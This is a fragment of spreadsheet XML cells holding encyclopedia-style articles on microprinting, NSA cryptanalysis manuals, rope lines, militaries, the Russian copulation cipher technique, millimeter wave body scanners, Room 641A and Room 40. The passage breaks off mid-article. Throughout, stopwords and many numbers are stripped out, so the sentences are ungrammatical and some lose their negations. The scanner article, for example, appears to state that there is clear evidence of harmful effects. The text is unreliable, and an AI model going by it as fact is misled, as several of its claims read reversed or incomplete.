    <t>microprinting production recognizable patterns characters printed medium scale requires magnification read naked eye. unaided eye, text appear solid line. attempts reproduce methods photocopy, image scanning, pantograph typically translate dotted solid line, unless reproduction method identify recreate patterns scale. microprint predominantly used anti-counterfeiting technique, inability easily reproduced widespread digital methods. while microphotography precedes microprint, microprint significantly influenced albert boni 1934 inspired friend, writer editor manuel komroff, showing experimentations related enlarging photographs. occurred boni could reduce rather enlarge photographs, technology might enable publication companies libraries access much greater quantities data minimum cost material storage space. over following decade, boni worked develop microprint, micro-opaque process pages photographed using 35mm microfilm printed cards using offset lithography. (u.s. patent 2260551a, u.s. patent 2260552a) this process proved produce index card stored pages text normal-sized publications reproducing. boni began readex microprint company produce license technology. also published article guide literature photography related subjects (1943), appeared supplemental 18th issue photo-lab index. usage currency commonly exhibits highest quality (smallest size) microprint demands highest level counterfeiting deterrence. example, series 2004 united states bill, microprint hidden within border lower left corner obverse (front) side, well twenty background. bank cheques, well various items value also commonly leverage microprinting methods, generally extreme size. example, personal bank cheques commonly place characters next signature line check; characters represent microprint indicate signature line check features actually microprinted characters. microprinted characters used anti-counterfeiting feature difficulty reproduced prominent serves overt deterrent warning item employs microprint. while microprinting scales readable human without microscopy, differentiation microprinting different scales. first postage stamp incorporate microprinting american wildflower series introduced united states postal service 1992. also first commemorative stamp wholly produced offset lithography. usps since issued stamps complex microprinting incorporated along dates, words, abbreviations usps even entire stamp designs composed microprint letters. there passing interest microprinting solution book storage libraries 1940's. librarian fremont rider championed microprinting micro-film reduced cost. also suggested entire books could printed backs library catalog cards, generally blank, replacing storage full-sized books library shelves. production microprint smallest scale producible hand using engraved offset printing plates method intaglio (printmaking). digital microtext printers utilize specially designed fonts purpose. used commonly micr (magnetic character recognition) toner particles also polyester based toners styrene acrylate polymer based toners. limited grayscale only, also color toners even specialized toners containing dyes sensitive ultraviolet infrared radiation producing fluorescence exposed radiations. microtext microfonts microprint scale capable printing methods cannot produced digital printer regardless resolution device. some digital fonts designed specifically purpose microprinting. these pseudo-microprint fonts referred microtext.xerox acclaimed developing microtext font claimed could produce characters 1/100 inch tall; 1/100 inch equivalent 0.72 points.in april 2015, videojet technologies released 1650 high resolution (hr) 1620 continuous inkjet (cij) printers, said capable printing sub-pixel size characters small height (equivalent 1.70079 points). printers 40-micron nozzle outputs 100,000 drops second ink. while printers make microprinting faster easier produce digitally, still reached true sub-pixel size less point.the smallest scale microtext laser printer produce microstructures using gold nanoparticle inks glass substrate, scientists concluded possible control production print patterns scale microns. after printing, nano-particle suspension heated using gaussian laser; heated, glass would expand thermal conductivity gold nano-ink. experiments, able fuse nano-particles together tighter formation continuous conductive line. such experiments directly include font characters could translate usage. also machine identification code microdot microfilmer microform microphotograph point (typography) preservation (library archival science) references external links guide literature photography related subjects (1943) albert boni</t>
  </si>
  <si>
    <t>Military Cryptanalytics</t>
  </si>
  <si>
    <t>military cryptanalytics milcryp sometimes known) revision lambros callimahos series books written william friedman title military cryptanalysis. also contain contributions cryptanalysts. training manual national security agency military cryptanalysts. published government 1957 1977, though parts written 1956 1959. callimahos work from introduction part volume callimahos: "this text represents extensive expansion revision, scope content, earlier work entitled 'military cryptanalysis, part william friedman. this expansion revision necessitated considerable advancement made since publication previous text." callimahos referred parts iii–vi first volume: "...part deal varieties aperiodic substitution systems, elementary cipher devices cryptomechanisms, embrace detailed treatment cryptomathematics diagnostic tests cryptanalysis; part treat transposition fractioning systems, combined substitution-transposition systems; part treat reconstruction codes, solution enciphered code systems, part treat solution representative machine cipher systems." however, parts iv–vi never completed. declassification both military cryptanalytics military cryptanalysis subjects mandatory declassification review (mdr) requests, including john gilmore 1992-1993 charles varga 2004 2016. four parts military cryptanalysis first parts military cryptanalytics series declassified. third part military cryptanalytics declassified part december 2020 published governmentattic.org 2021. 1984 released copies military cryptanalytics parts (us) national archives records administration, record group 457, srh-273 srh-274, respectively. ("srh" stands "special research history.") reprints declassified books except third part military cryptanalytics reprinted aegean park press. each part military cryptanalytics consists volumes: first volume contains tutorial text second volume contains appendices. part includes material uniliteral multiliteral ciphers polyalphabetic ciphers. part includes material repeating-key bipartite systems periodic ciphers. part volume includes zendian problem, practical exercise traffic analysis cryptanalysis. aegean park press edition, wayne barker added programs trs-80. books military cryptanalytics, part volume isbn 0-89412-073-5 military cryptanalytics, part volume isbn 0-89412-074-3 military cryptanalytics, part volume isbn 0-89412-075-1 military cryptanalytics, part volume isbn 0-89412-076-x military cryptanalysis, part isbn 0-89412-044-1 military cryptanalysis, part isbn 0-89412-064-6 military cryptanalysis, part iii, simpler varieties aperiodic substitution systems, isbn 0-89412-196-0 military cryptanalysis, part transposition fractionating systems, isbn 0-89412-198-7 also national security agency academic publications external links military cryptanalysis nsa.gov; provides text friedman series (only) friedman publications nsa.gov friedman collection archive.org including military cryptanalysis military cryptanalytics "legal cases privacy/foia gilmore (crypto docs)" archive 2004 foia request military cryptanalytics 2016 foia request military cryptanalytics military cryptanalytics, part iii, lambros callimahos, 1977</t>
  </si>
  <si>
    <t>Rope line</t>
  </si>
  <si>
    <t>rope line setting major celebrity, i.e. movie star, musician, supermodel, politician, internet celebrity, interacts general public. crowd control barrier originally rope typically secure metal fence separates celebrity crowd. american political terminology, politician "walking rope line" "working rope line" engaging supporters hand shaking, chatting, signing autographs providing photo opportunities. popular 2004, u.s. president george bush explained ahmed chalabi informal settings, "just kind working rope line" 2004 state union address. footnotes</t>
  </si>
  <si>
    <t>Military</t>
  </si>
  <si>
    <t>military, also known collectively armed forces, heavily armed, highly organized force primarily intended warfare. typically authorized maintained sovereign state, members identifiable distinct military uniform. consist military branches army, navy, force, space force, marines, coast guard. main task military usually defined defence state interests external armed threats. broad usage, terms armed forces military often treated synonymous, although technical usage distinction sometimes made country's armed forces include military paramilitary forces. there various forms irregular military forces, belonging recognized state; though share many attributes regular military forces, less often referred simply military. nation's military function discrete social subculture, dedicated infrastructure military housing, schools, utilities, logistics, hospitals, legal services, food production, finance, banking services. beyond warfare, military employed additional sanctioned non-sanctioned functions within state, including internal security threats, population control, promotion political agenda, emergency services reconstruction, protecting corporate economic interests, social ceremonies national honour guards.the profession soldiering part military older recorded history itself. some enduring images classical antiquity portray power feats military leaders. battle kadesh 1274 defining points pharaoh ramses ii's reign, monuments commemorate bas-relief. thousand years later, first emperor unified china, huang, determined impress gods military might buried army terracotta soldiers. romans paid considerable attention military matters, leaving posterity many treatises writings subject, well many lavishly carved triumphal arches victory columns. etymology definitions first recorded word military english, spelled militarie, 1582. comes latin militaris (from latin miles, meaning "soldier") french, uncertain etymology, suggestion derived *mil-it- going body mass.as noun, military usually refers generally country's armed forces, sometimes, specifically, senior officers command them. general, refers physicality armed forces, personnel, equipment, physical area occupy. adjective, military originally referred soldiers soldiering, soon broadened apply land forces general, anything profession. names royal military academy (1741) united states military academy (1802) reflect this. however, time napoleonic wars, 'military' began used reference armed forces whole, 'military service', 'military intelligence', 'military history'. such, connotes activity performed armed force personnel. history military history often considered history conflicts, history state militaries. differs somewhat history war, military history focusing people institutions war-making, history focuses evolution face changing technology, governments, geography. military history number facets. main facet learn past accomplishments mistakes, effectively wage future. another create sense military tradition, used create cohesive military forces. still, another learn prevent wars effectively. human knowledge military largely based recorded oral history military conflicts (war), participating armies navies and, recently, forces. organization personnel units despite growing importance military technology, military activity depends people. example, 2000 british army declared: "man still first weapon war." rank role military organization characterized strict command hierarchy divided military rank, ranks normally grouped descending order authority) officers (e.g. colonel), non-commissioned officers (e.g. sergeant), personnel lowest rank (e.g. private soldier). while senior officers make strategic decisions, subordinated military personnel (soldiers, sailors, marines, airmen) fulfil them. although rank titles vary military branch country, rank hierarchy common state armed forces worldwide. addition rank, personnel occupy many trade roles, often grouped according nature role's military tasks combat operations: combat roles (e.g. infantry), combat support roles (e.g. combat engineers), combat service support roles (e.g. logistical support). past, armed forces communist states, soviet union, china albania, attempted abolish military ranks, later reintroduced operational difficulties relating command control. recruitment personnel recruited conscripted, depending system chosen state. most military personnel males; minority proportion female personnel varies internationally (approximately india, sweden, south africa). while two-thirds states recruit conscript adults, 2017 states still relied partly children (usually aged staff armed forces.whereas recruits join officers tend upwardly-mobile, enlisted personnel childhood background relative socio-economic deprivation. example, suspended conscription 1973, "the military disproportionately attracted african american men, lower-status socioeconomic backgrounds, nonacademic high school programs, whose high school grades tended low". however, study released 2020 socio-economic backgrounds u.s. armed forces personnel suggests parity slightly higher civilian population respect socio-economic indicators parental income, parental wealth cognitive abilities. study found technological, tactical, operational doctrinal changes change demand personnel. furthermore, study suggests disadvantaged socio-economic groups less likely meet requirements modern u.s. military. obligations obligations military employment many. full-time military employment normally requires minimum period service several years; years typical armed forces australia, example, depending role, branch, rank. some armed forces allow short discharge window, normally training, recruits leave armed force right. alternatively, part-time military employment, known reserve service, allows recruit maintain civilian training military discipline weekends; called deploy operations supplement full-time personnel complement. after leaving armed forces, recruits remain liable compulsory return full-time military employment order train deploy operations.military introduces offences recognised civilian courts, absence without leave (awol), desertion, political acts, malingering, behaving disrespectfully, disobedience (see, example, offences military united kingdom). penalties range summary reprimand imprisonment several years following court martial. certain fundamental rights also restricted suspended, including freedom association (e.g. union organizing) freedom speech (speaking media). military personnel countries right conscientious objection believe order immoral unlawful, cannot good conscience carry out. personnel posted bases home country overseas, according operational need, deployed bases exercises operations anywhere world. during peacetime, military personnel generally stationed garrisons permanent military facilities, mostly conduct administrative tasks, training education activities, technology maintenance, recruitment. training initial training conditions recruits demands military life, including preparedness injure kill people, face mortal danger without fleeing. physically psychologically intensive process resocializes recruits unique nature military demands. example: individuality suppressed (e.g. shaving head recruits, issuing uniforms, denying privacy, prohibiting first names); daily routine tightly controlled (e.g. recruits must make beds, polish boots, stack clothes certain way, mistakes punished); continuous stressors deplete psychological resistance demands instructors (e.g. depriving recruits sleep, food, shelter, shouting insults giving orders intended humiliate) frequent punishments serve condition group conformity discourage poor performance; disciplined drill instructor presented role model ideal soldier. intelligence next requirement comes fairly basic need military identify possible threats called upon face. purpose, commanding forces military, well often civilian personnel participate identification threats. this organization, system process collectively called military intelligence (mi). difficulty using military intelligence concepts military intelligence methods nature secrecy information seek, clandestine nature intelligence operatives work obtaining plans conflict escalation, initiation combat, invasion. important part military intelligence role military analysis performed assess military capability potential future aggressors, provide combat modelling helps understand factors comparison forces made. this helps quantify qualify statements "china india maintain largest armed forces world" "the u.s. military considered world's strongest". although groups engaged combat, militants resistance movements, refer using military terminology, notably 'army' 'front', none structure national military justify reference, usually rely support outside national militaries. they also terms conceal true capabilities, impress potential ideological recruits. having military intelligence representatives participate execution national defence policy important, becomes first respondent commentator policy expected strategic goal, compared realities identified threats. when intelligence reporting compared policy, becomes possible national leadership consider allocating resources officers subordinates military pay, expense maintaining military facilities military support services them. economics defense economics financial monetary efforts made resource sustain militaries, finance military operations, including war. process allocating resources conducted determining military budget, administered military finance organization within military. military procurement authorized purchase contract provision goods services military, whether peacetime permanent base, combat zone local population. capability development capability development, often referred military 'strength', arguably complex activities known humanity; requires determining: strategic, operational, tactical capability requirements counter identified threats; strategic, operational, tactical doctrines acquired capabilities used; identifying concepts, methods, systems involved executing doctrines; creating design specifications manufacturers would produce adequate quantity quality combat; purchase concepts, methods, systems; create forces structure would concepts, methods, systems effectively efficiently; integrate concepts, methods, systems force structure providing military education, training, practice preferably resembles combat environment intended use; create military logistics systems allow continued uninterrupted performance military organizations combat conditions, including provision health services personnel, maintenance equipment; services assist recovery wounded personnel, repair damaged equipment; finally, post-conflict demobilization, disposal stocks surplus peacetime requirements. development military doctrine perhaps important capability development activities, determines military forces used conflicts, concepts methods used command employ appropriately military skilled, armed equipped personnel achievement tangible goals objectives war, campaign, battle, engagement, action. line strategy tactics easily blurred, although deciding discussed sometimes matter personal judgement commentators, military historians. forces level organization strategic tactical called operational mobility. science because concepts methods used military, many systems found commercial branches, much material researched, designed, developed, offered inclusion arsenals military science organizations within overall structure military. military scientists therefore found interact arms services armed forces, levels military hierarchy command. although concerned research military psychology, particularly combat stress affect troop morale, often bulk military science activities directed military intelligence technology, military communications, improving military capability research. design, development, prototyping weapons, military support equipment, military technology general, also area much effort invested includes everything global communication networks aircraft carriers paint food. logistics possessing military capability sufficient capability cannot deployed for, employed combat operations. achieve this, military logistics used logistics management logistics planning forces military supply chain management, consumables, capital equipment troops. although mostly concerned military transport, means delivery using different modes transport; military trucks, container ships operating permanent military base, also involves creating field supply dumps rear combat zone, even forward supply points specific unit's tactical area responsibility. these supply points also used provide military engineering services, recovery defective derelict vehicles weapons, maintenance weapons field, repair field modification weapons equipment; peacetime, life-extension programmes undertaken allow continued equipment. important role logistics supply munitions primary type consumable, storage, disposal. combat primary reason existence military engage combat, required national defence policy, win. this represents organisational goal military, primary focus military thought military history. victory achieved, shape assumes, studied most, all, military groups three levels. strategic victory military strategy management forces wars military campaigns commander-in-chief, employing large military forces, either national allied whole, component elements armies, navies forces; army groups, naval fleets, large numbers aircraft. military strategy long-term projection belligerents' policy, broad view outcome implications, including outside concerns military command. military strategy concerned supply planning, management field forces combat them. scope strategic military planning span weeks, often months even years. operational victory operational mobility within warfare military doctrine, level command coordinates minute details tactics overarching goals strategy. common synonym operational art. operational level scale bigger line sight time important, smaller strategic level, production politics considerations. formations operational level able conduct operations own, sufficient size directly handled significant impact strategic level. this concept pioneered german army prior second world war. level, planning duration activities takes week month, executed field armies army corps naval equivalents. tactical victory military tactics concerns methods engaging defeating enemy direct combat. military tactics usually used units hours days, focused specific, close proximity tasks objectives squadrons, companies, battalions, regiments, brigades, divisions, naval force equivalents.one oldest military publications war, chinese philosopher tzu. written century bce, 13-chapter book intended military instruction, military theory, huge influence asian military doctrine, late 19th century, european united states military planning. even used formulate business tactics, even applied social political areas. classical greeks romans wrote prolifically military campaigning. among best-known roman works julius caesar's commentaries gallic wars, roman civil written major works tactics come late roman period: taktike theoria aelianus tacticus, militari ('on military matters') vegetius. taktike theoria examined greek military tactics, influential byzantine world golden islam. militari formed basis european military tactics late 17th century. perhaps enduring maxim igitur desiderat pacem, praeparet bellum (let desires peace prepare war). changing nature combat introduction artillery european middle ages, infantry firearms renaissance, attempts made define identify strategies, grand tactics, tactics would produce victory often achieved romans praying gods battle. later became known military science, later still, would adopt scientific method approach conduct military operations influence industrial revolution thinking. seminal book war, prussian major-general leading expert modern military strategy, carl clausewitz defined military strategy 'the employment battles gain war'. according clausewitz: strategy forms plan war, links together series acts lead final decision, say, makes plans separate campaigns regulates combats fought each. hence, clausewitz placed political aims military goals, ensuring civilian control military. military strategy triumvirate 'arts' 'sciences' governed conduct warfare, others being: military tactics, execution plans manoeuvring forces battle, maintenance army. meaning military tactics changed time; deployment manoeuvring entire land armies fields ancient battles, galley fleets; modern small unit ambushes, encirclements, bombardment attacks, frontal assaults, assaults, hit-and-run tactics used mainly guerrilla forces, and, cases, suicide attacks land sea. evolution aerial warfare introduced combat tactics. often, military deception, form military camouflage misdirection using decoys, used confuse enemy tactic. major development infantry tactics came increased trench warfare 19th 20th centuries. this mainly employed world gallipoli campaign, western front. trench warfare often turned stalemate, broken large loss life, because, order attack enemy entrenchment, soldiers exposed man's land' heavy fire opposing entrenched enemy. technology occupation, since ancient times, military distinguished members society tools, military weapons, military equipment used combat. when stone humans first took sliver flint spear, first example applying technology improve weapon. since then, advances made human societies, weapons, irretrievably linked. stone weapons gave bronze weapons, later, iron weapons. with technological change, realized tangible increase military capability, greater effectiveness sharper edge defeating leather armour, improved density materials used manufacture weapons. land, first really significant technological advance warfare development ranged weapons, notably, sling. next significant advance came domestication horses mastering equestrianism. arguably, greatest invention affected military, society, adoption fire, wheel, construction chariot. there advances military technology, until, mechanical action slinger, greeks, egyptians, romans, persians, chinese, etc., developed siege engines. manufactured increasingly larger powerful versions, increase weapon range, armour penetration performance. these developed powerful composite recurve bows, crossbows ancient china. these proved particularly useful rise cavalry, horsemen encased ever-more sophisticated armour came dominate battlefield. somewhat earlier, medieval china, gunpowder invented, increasingly used military combat. gunpowder early vase-like mortars europe, advanced versions long cross bow, armour-piercing arrowheads, dominance armoured knight. after long bow, required great skill strength use, next significant technological advance musket, could used effectively, little training. time, successors muskets cannon, form rifles artillery, would become core battlefield technology. speed technological advances accelerated civilian applications, warfare became industrialized. newly invented machine repeating rifle redefined firepower battlefield, and, part, explains high casualty rates american civil war. next breakthrough conversion artillery parks muzzle loading guns, quicker loading breech loading guns recoiling barrel allowed quicker aimed fire shield. widespread introduction smoke (smokeless) propellant powders since 1880s also allowed great improvement artillery ranges. development breech loading greatest effect naval warfare, first time since middle ages, altering weapons mounted warships, therefore naval tactics, divorced reliance sails invention internal combustion. advance military naval technology design submarine, weapon, torpedo. main battle tanks, heavy equipment armoured fighting vehicles, military aircraft, ships, characteristic organized military forces. during world need break deadlock trench warfare rapid development many technologies, particularly tanks. military aviation extensively used, bombers became decisive many battles world marked frantic period weapons development history. many designs, concepts used combat, existing technologies warfare improved 1939 1945. during war, significant advances made military communications increased radio, military intelligence radar, military medicine penicillin, air, guided missile, aircraft, helicopters seen first time. perhaps infamous military technologies creation atomic bomb, although exact effects radiation unknown early 1950s. greater military vehicles finally eliminated cavalry military force structure. after world onset cold war, constant technological development weapons institutionalized, participants engaged constant 'arms race' capability development. this constant state weapons development continues present, remains constant drain national resources, blame military–industrial complex. significant technological developments influenced combat guided missiles, used branches armed services. more recently, information technology, surveillance, including space-based reconnaissance systems, played increasing role military operations. impact information warfare focuses attacking command communication systems, military databases, coupled development military technology, robotic systems intelligence combat, hardware software applications. recently, also particular focus towards renewable fuels running military vehicles unlike fossil fuels, renewable fuels produced country, creating strategic advantage. military committed energy consumption come alternative sources. part society much military history, armed forces considered heads societies, recently, crowned heads states. democracy political system public interest, public force. relationship military society serves complicated ever-evolving one. much depends nature society itself, whether sees military important, example time threat war, burdensome expense typified defence cuts time peace. difficult matter relation military society control transparency. countries, limited information military operations budgeting accessible public. however transparency military sector crucial fight corruption. this showed government defence anti-corruption index transparency international published 2013.militaries often function societies within societies, military communities, economies, education, medicine, aspects functioning civilian society. although 'military' limited nations many private military companies pmc's) used 'hired' organizations figures security, escort, means protection; police, agencies, militaries absent trusted. ideology ethics militarist ideology society's social attitude best served, beneficiary government, guided concepts embodied military culture, doctrine, system, leaders. either cultural memory, national history, potentiality military threat, militarist argument asserts civilian population dependent upon, thereby subservient needs goals military continued independence. militarism sometimes contrasted concepts comprehensive national power, soft power hard power. most nations separate military laws regulate conduct peacetime. early exponent hugo grotius, whose peace (1625) major impact humanitarian approach warfare development. theme echoed gustavus adolphus. ethics warfare developed since 1945, create constraints military treatment prisoners civilians, primarily geneva conventions; rarely apply military forces internal security troops times political conflict results popular protests incitement popular uprising. international protocols restrict use, even created international bans types weapons, notably weapons mass destruction (wmd). international conventions define constitutes crime, provides crimes prosecution. individual countries also elaborate codes military justice, example united states' uniform code military justice lead court martial military personnel found guilty crimes. military actions sometimes argued justified furthering humanitarian cause, disaster relief operations, defence refugees. term military humanism used refer actions. also armed forces worldlist countries number military paramilitary personnel list countries military strength index list countries level military equipment list countries global militarization index list countries without armed forces list countries military expenditures list countries past military expenditure list countries military expenditure capita list forces list armies list navies references external links military expenditure hosted lebanese economy forum, extracted world bank public data. military curlie</t>
  </si>
  <si>
    <t>Russian copulation</t>
  </si>
  <si>
    <t>cryptography, russian copulation method rearranging plaintext encryption conceal stereotyped headers, salutations, introductions, endings, signatures, etc. this obscures clues cryptanalyst, used increase cryptanalytic difficulty naive cryptographic schemes (however, modern schemes contain rigorous defences; ciphertext indistinguishability). this course desirable sending messages wishing remain confidential. padding another technique obscuring clues. technique break starting plaintext message parts invert order parts (similar circular shift). this puts endings beginnings (presumably location boilerplate phrases) "somewhere middle" version plaintext actually encrypted. messages, mostly human language (e.g., images tabular data), decrypted version plaintext present problems reversing inversion. messages expressed ordinary language, sufficient redundancy inversion almost always reversed human immediately inspection.the english phrase suggests originally came observation russian cryptographic practice. however, technique generally useful neither was, limited russians. references</t>
  </si>
  <si>
    <t>Millimeter wave scanner</t>
  </si>
  <si>
    <t>millimeter wave scanner whole-body imaging device used detecting objects concealed underneath person’s clothing using form electromagnetic radiation. typical uses technology include detection items commercial loss prevention, smuggling, screening weapons government buildings airport security checkpoints. common technologies full body scanner used body imaging; competing technology backscatter x-ray. millimeter wave scanners come varieties: active passive. active scanners direct millimeter wave energy subject interpret reflected energy. passive systems create images using ambient radiation radiation emitted human body objects. technical details active scanners, millimeter wave transmitted antennas simultaneously rotate around body. wave energy reflected back body objects body used construct three-dimensional image, displayed remote monitor analysis. history first millimeter-wave full body scanner developed pacific northwest national laboratory (pnnl) richland, washington. operation four national laboratories battelle manages u.s. department energy. 1990's, patented holographic-imagery technology, research development support provided federal aviation administration (faa). 2002, silicon valley startup safeview, inc. obtained exclusive license pnnl's (background) intellectual property, commercialize technology. from 2002 2006, safeview developed production-ready millimeter body scanner system, software included scanner control, algorithms threat detection object recognition, well techniques conceal images order resolve privacy concerns. during time, safeview developed foreground several patent applications. 2006, safeview's body scanning portals installed trialed various locations around globe. they installed border crossings israel, international airports mexico city amsterdam's schiphol, ferry landings singapore, railway stations government buildings like hague, commercial buildings tokyo. they also employed secure soldiers workers iraq's green zone. 2006, safeview acquired communications. from 2006 2020, communications (later l3harris) continued make incemental enhancements scanner systems, deploying thousands units world wide. 2020, leidos acquired l3harris, included body scanner business unit. privacy concerns historically, privacy advocates concerned full body scanning technology used display detailed image surface skin clothing, prosthetics including breast prostheses, medical equipment normally hidden, colostomy bags. these privacy advocates called images "virtual strip searches". however, 2013 u.s. congress prohibited display detailed images required display metal objects generic body outline instead person's actual skin. such generic body outlines made automatic target recognition (atr) software. june 2013, back-scatter full body scanners removed u.s. airports, could comply tsa's software requirements. millimeter-wave full body scanners utilize atr, compliant software requirements.software imaging technology also mask specific body parts. proposed remedies privacy concerns include scanning people independently detected carrying contraband, developing technology mask genitals private parts. locations, travelers choice body scan "patdown". australia, scans mandatory however passengers scanned. case individual must either screened alternative method includes least enhanced hand search private, government website. united states, transportation security administration (tsa) claimed taken steps address privacy objections. claimed images captured machines stored. hand, u.s. marshals service admitted saved thousands images captured florida checkpoint. officer sitting machine image; rather screen shows whether viewing officer confirmed passenger cleared. conversely, officer views image person scanned device. locations, updated software removed necessity separate officer remote location. these units generate generic image person, specific areas suspicion highlighted boxes. suspicious items detected machine, green screen instead appears indicating passenger cleared. concerns remain alternative ways capture disseminate image. additionally, protective steps often entirely address underlying privacy concerns. subjects object anyone viewing state effective undress, even agent next machine, even image retrievable. reports full-body scanner images improperly perhaps illegally saved disseminated emerged. possible health effects millimeter wavelength radiation subset microwave radio frequency spectrum. even high-energy end, still orders magnitude lower energy nearest radiotoxic neighbour (ultraviolet) electromagnetic spectrum. such, millimeter wave radiation non-ionizing incapable causing cancers radiolytic bond cleavage. shallow penetration depth millimeter waves tissue (typically less mm), acute biological effects irradiation localized epidermal dermal layers manifest primarily thermal effects. there clear evidence date harmful effects caused localised heating ensuing chemical changes (expression heat shock proteins, denaturation, proteolysis, inflammatory response, also mobile phone radiation health). energy density required produce thermal injury skin much higher typically delivered active millimeter wave scanner.the fragmented misfolded molecules resulting thermal injury delivered neighbouring cells diffusion systemic circulation perfusion. increased skin permeability irradiation exacerbates possibility. therefore plausible molecular products thermal injury (and distribution areas remote site irradiation) could cause secondary injury. note would different effects thermal injury sustained conventional fashion. increasing ubiquity millimeter wave radiation (see wigig), research potential biological effects ongoing.independent thermal injury, 2009 study funded national institute health, conducted u.s. department energy's alamos national laboratories theoretical division center nonlinear studies harvard university medical school found terahertz range radiation creates changes breathing dynamics, creating apparent interference naturally occurring local strand separation dynamics double-stranded consequently, function. article referenced technology journal article october 2009. millimeter wave scanners confused backscatter x-ray scanners, completely different technology used similar purposes airports. x-rays ionizing radiation, energetic millimeter waves five orders magnitude, raise concerns possible mutagenic potential. effectiveness efficacy millimeter wave scanners detecting threatening objects questioned. formal studies demonstrated relative inability scanners detecting objects—dangerous not—on person scanned. additionally, studies suggested cost–benefit ratios scanners poor. january 2011, report terrorist capture result body scanner. series repeated tests, body scanners able detect handgun hidden undercover agent's undergarments, agents responsible monitoring body scanners deemed fault recognizing concealed weapon.millimeter wave scanners also problems reading sweat, addition yielding false positives buttons folds clothing. some countries, germany, reported false-positive rate 54%. deployment while airport security visible public body scanners, companies opted deploy passive employee screening help reduce inventory shrink distribution centers.the border agency (the predecessor visas immigration) initiated passive screening technology detect illicit goods.as april 2009, u.s. transportation security administration began deploying scanners airports, e.g., angeles international airport (lax). these machines also deployed jersey city path train system. they also deployed francisco international airport (sfo), well salt lake international airport (slc), indianapolis international airport (ind), detroit-wayne county metropolitan airport (dtw), minneapolis-st. paul international airport (msp), vegas international airport (las). three security scanners using millimeter waves schiphol airport amsterdam 2007, expected installed later. passenger's head masked view security personnel. passive scanners also currently fiumicino airport, italy. they next deployed malpensa airport.the federal courthouse orlando, florida employs passive screening devices capable recording storing images. canada 2008, canadian transport security authority held trial scanners kelowna international airport kelowna, british columbia. before trial, office privacy commissioner canada (opcc) reviewed preliminary privacy impact assessment catsa accepted recommendations opcc. october 2009, assistant privacy commissioner, chantal bernier, announced opcc tested scanning procedure, privacy safeguards catsa agreed would “meet test proper reconciliation public safety privacy”. january 2010, transport canada confirmed scanners ordered, used secondary screening eight canadian airports. announcement resulted controversies privacy, effectiveness whether exemption would large loophole.scanners currently used saskatoon (yxe), toronto (yyz), montréal (yul), quebec (yqb), calgary (yyc), edmonton (yeg), vancouver (yvr), halifax (yhz), winnipeg (ywg). philippines ninoy aquino international airport manila installed body scanners smiths four airport terminals 2015. scanners use, controversial among airport security screeners. other applications scanners used physical measurement body shape applications apparel design, prosthetic devices design, ergonomics, entertainment gaming. also backscatter x-ray security scanning applications) explosives trace-detection portal machine (puffer machine) full body scanner security theater electromagnetic radiation extremely high frequency microwave references external links list american airports currently/will millimeter wave scanners passenger searches challenge airport body scanners full-body scanners: full protection terrorist attacks full-on violation constitution?</t>
  </si>
  <si>
    <t>Room 641A</t>
  </si>
  <si>
    <t>room 641a telecommunication interception facility operated at&amp;t u.s. national security agency, part warrantless surveillance program authorized patriot act. facility commenced operations 2003 purpose publicly revealed 2006. description room 641a located communications building folsom street, francisco, three floors occupied at&amp;t purchased at&amp;t. room referred internal at&amp;t documents [study group secure room. room measures feet (7.3 14.6 contains several racks equipment, including narus 6400, device designed intercept analyze internet communications high speeds. fiber optic lines beam splitters installed fiber optic trunks carrying internet backbone traffic. analysis scott marcus, former former adviser federal communications commission, access internet traffic passes building, therefore "the capability enable surveillance analysis internet content massive scale, including overseas purely domestic traffic."the existence room revealed former at&amp;t technician mark klein subject 2006 class action lawsuit electronic frontier foundation at&amp;t. klein claims told similar black rooms operated facilities around country.room 641a controversies surrounding subjects episode frontline, current affairs documentary program pbs. originally broadcast 2007. also featured pbs's march 2008. room also covered nova episode "the factory". lawsuits electronic frontier foundation (eff) filed class-action lawsuit at&amp;t january 2006, accusing telecommunication company violating privacy customers collaborating national security agency (nsa) massive, illegal program wiretap data-mine americans' communications. july 2006, federal judge denied government's at&amp;t's motions dismiss case, chiefly ground state secrets privilege, allowing lawsuit forward. august 2007, case heard ninth circuit court appeals dismissed december 2011, based retroactive grant immunity congress telecommunications companies cooperated government. u.s. supreme court declined hear case.a different case electronic frontier foundation filed september 2008, titled jewel nsa. after many years litigation, april 2019, ruling northern district california jewel concluded evidence presented plaintiff's experts insufficient; "the court confirms earlier finding klein cannot establish content, function, purpose secure room at&amp;t site based independent knowledge." ruling noted, "klein speculate data actually processed secure room purpose, never involved operation." court went discredit experts called upon, citing heavy reliance klein declaration. spring 2006, lawsuits filed various telecommunications companies, response article.there speculation several rooms similar exist united states. gallery also cabinet noir echelon fairview (surveillance program) fiber tapping hemisphere project, mass surveillance program conducted at&amp;t paid main core warrantless surveillance controversy president's surveillance program prism (surveillance program) signals intelligence upstream collection utah data center thomas street references external links "electronic frontier foundation's page nsa's domestic spying". "technician mark klein discussing room 641a". countdown episode. november 2007. archived original february 2009 youtube. kris, david (2014). bulk collection tangible things" (pdf). journal national security policy. archived original 2017.</t>
  </si>
  <si>
    <t>Room 40</t>
  </si>
  <si>
    <t>room also known o.b. (old building; officially part nid25), cryptanalysis section british admiralty first world war. group, formed october 1914, began rear-admiral henry oliver, director naval intelligence, gave intercepts german radio station nauen, near berlin, director naval education alfred ewing, constructed ciphers hobby. ewing recruited civilians william montgomery, translator theological works german, nigel grey, publisher. estimated room decrypted around 15,000 intercepted german communications wireless telegraph traffic. most notably section intercepted decoded zimmermann telegram, secret diplomatic communication issued german foreign office january 1917 proposed military alliance germany mexico. decoding described significant intelligence triumph britain world played significant role drawing then-neutral united states conflict.room operations evolved captured german naval codebook, signalbuch kaiserlichen marine (skm), maps (containing coded squares) britain's russian allies passed admiralty. russians seized material german cruiser magdeburg aground estonian coast august 1914. russians recovered three four copies warship carried; retained passed british. october 1914 british also obtained imperial german navy's handelsschiffsverkehrsbuch (hvb), codebook used german naval warships, merchantmen, naval zeppelins u-boats: royal australian navy seized copy australian-german steamer hobart october. november british trawler recovered safe sunken german destroyer s-119, found verkehrsbuch (vb), code used germans communicate naval attachés, embassies warships overseas. several sources claimed march 1915 british detachment impounded luggage wilhelm wassmuss, german agent persia shipped unopened, london, director naval intelligence, admiral william reginald (blinker) hall discovered contained german diplomatic code book, code 13040. however, story since debunked.the section retained "room informal name even though expanded moved offices. alfred ewing directed room 1917, direct control passed hall, assisted william milbourne james. although room decrypted imperial german communications throughout first world war, function compromised admiralty's insistence decoded information would analysed naval specialists. this meant room operators could decrypt encoded messages permitted understand interpret information themselves. background 1911, sub-committee committee imperial defence cable communications concluded event germany, german-owned submarine cables destroyed. early hours august 1914, cable ship alert located germany's five trans-atlantic cables, english channel. soon after, cables running britain germany cut. immediate consequence, significant increase 